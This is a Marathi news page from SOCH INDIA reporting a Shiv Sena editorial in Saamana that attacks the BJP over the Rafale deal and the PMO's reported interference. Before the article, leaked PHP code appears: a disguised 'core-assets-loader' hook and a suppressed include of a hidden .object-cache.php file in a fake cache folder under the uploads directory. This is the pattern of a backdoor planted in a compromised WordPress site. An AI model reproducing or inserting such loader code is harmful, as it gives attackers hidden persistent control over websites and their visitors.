add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); विरोधक मारले जातील, पण सत्य जिवंत राहील; शिवसेनेचा ‘राफेल’वरुन निशाणा – SOCH INDIA
Menu

विरोधक मारले जातील, पण सत्य जिवंत राहील; शिवसेनेचा ‘राफेल’वरुन निशाणा

nobanner

राफेल करारावरुन शिवसेनेने पुन्हा एकदा भाजपावर निशाणा साधला. ‘सत्यमेव जयते’ हाच देश जिवंत ठेवण्याचा मंत्र आहे. विरोधक मारले जातील, पण सत्य जिवंत राहील. बाके बडवून सत्य मरणार का?, असा सवाल शिवसेनेने भाजपाला विचारला आहे.

राफेलच्या नव्या कराराच्या प्रक्रियेत संरक्षण मंत्रालयाला डावलून पंतप्रधान कार्यालयाने केलेल्या हस्तक्षेपाला संरक्षण मंत्रालयाने तीव्र आक्षेप घेतला होता, असे वृत्त शुक्रवारी प्रकाशित झाले होते. या पार्श्वभूमीवर शिवसेनेने सामनाच्या अग्रलेखातून निशाणा साधला.

पंतप्रधान मोदी यांनी गुरुवारी संसदेत देशभक्तीवर भाषण केले. राफेलचे समर्थन केले. दुसऱ्याच दिवशी राफेल प्रकरणातील ‘काळे पान’ समोर आले. बाके वाजवून देशभक्तीचे नारे देणार्‍यांची तोंडे त्यामुळे बंद झाली. राफेल प्रकरणातील मोदींच्या ‘सहभागा’चा एक नवा दस्तऐवज बाहेर पडला आहे. यानिमित्ताने राहुल गांधी यांनी केलेल्या आरोपांचे काय? उगाच विरोधकांना दोष का देता? ‘सत्यमेव जयते’ हाच देश जिवंत ठेवण्याचा मंत्र आहे. विरोधक मारले जातील, पण सत्य जिवंत राहील, असे शिवसेनेने म्हटले आहे.

Leave a Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>